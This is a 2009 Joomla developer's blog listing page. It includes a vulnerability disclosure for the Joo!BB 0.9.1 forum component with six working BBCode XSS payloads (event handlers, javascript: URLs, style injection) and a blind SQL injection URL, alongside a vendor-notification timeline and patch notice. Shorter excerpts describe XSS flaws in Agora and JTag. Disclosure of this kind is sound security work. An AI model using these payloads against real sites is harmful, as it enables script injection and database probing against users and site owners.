Validate Custom Administrator Form
Monday, 10 August 2009 15:20

I've been working on a custom Joomla component for a client at work, and needed to validate that certain aspects of the admin form. I could have recreated the wheel and written my own validation routine, but I really wanted to use Joomla's core validation behavior. What follows is how I managed to validate a form when submitted using the core Joomla toolbar buttons.

Last Updated on Monday, 10 August 2009 15:41
Read more...
Interview at CMSWire
Monday, 03 August 2009 16:42
As I reported earlier, I was interviewed in the not too recent past concerning XSS security and Joomla. I am proud to say that the interview has been posted on CMSWire, with a prominent back link to yours truly in the first paragraph!
The whole interview can be read here.
Joo!BB 0.9.1 Multiple Vulnerabilities
Saturday, 01 August 2009 00:00

The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.

  1. Nested [img] XSS

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]

  2. Nested [url] XSS

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]

  3. BBCode [color] Tag Injection

    [color=#ff0000;font-size:100px;]XSS[/color]

  4. BBCode [url] Location XSS

    [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]

  5. BBCode [font] Tag Injection

    [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]

  6. BBCode [table] Tag XSS

    [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]

  7. Blind SQL Injection

    /index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- '
    If MySQL is version 5, this will return results. Otherwise, no results.
These vulnerabilities have been patched and users are strongly urged to update to 0.9.1 Patch 1

Timeline

  • Vulnerabilities Discovered: 26 July 2009
  • Vendor Notified: 27 July 2009
  • Vendor Response: 29 July 2009
  • Update Available: 01 August 2009
  • Disclosure: 01 August 2009
Last Updated on Thursday, 30 September 2010 17:39
Agora 3.0.0 RC1 Rev.4 XSS Vulnerability
Thursday, 16 July 2009 12:04

The Joomla component Agora 3.0.0 RC1 Rev.4 suffers from a Persistent XSS vulnerability. This can be exploited by uploading a malicious SWF file as an attachment then embedding it using the [swf] BBCode tag from the local server, thus bypassing any crossdomain policy.

Last Updated on Thursday, 30 September 2010 17:41
Read more...
JTag Ticketing System Persistent XSS Vulnerability
Saturday, 11 July 2009 23:37

Well, another XSS vulnerable BBCode implementation, this time on JTag Ticketing System. This is the exact same vulnerability I posted about earlier concerning WebAmoeba.

Read more...
More Articles...
Page 13 of 16

Featured Extensions

FREE
$25.00
$10.00
FREE
You Save: $10.00
$1.00
FREE
You Save: $1.00

Latest Articles

Most Popular

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions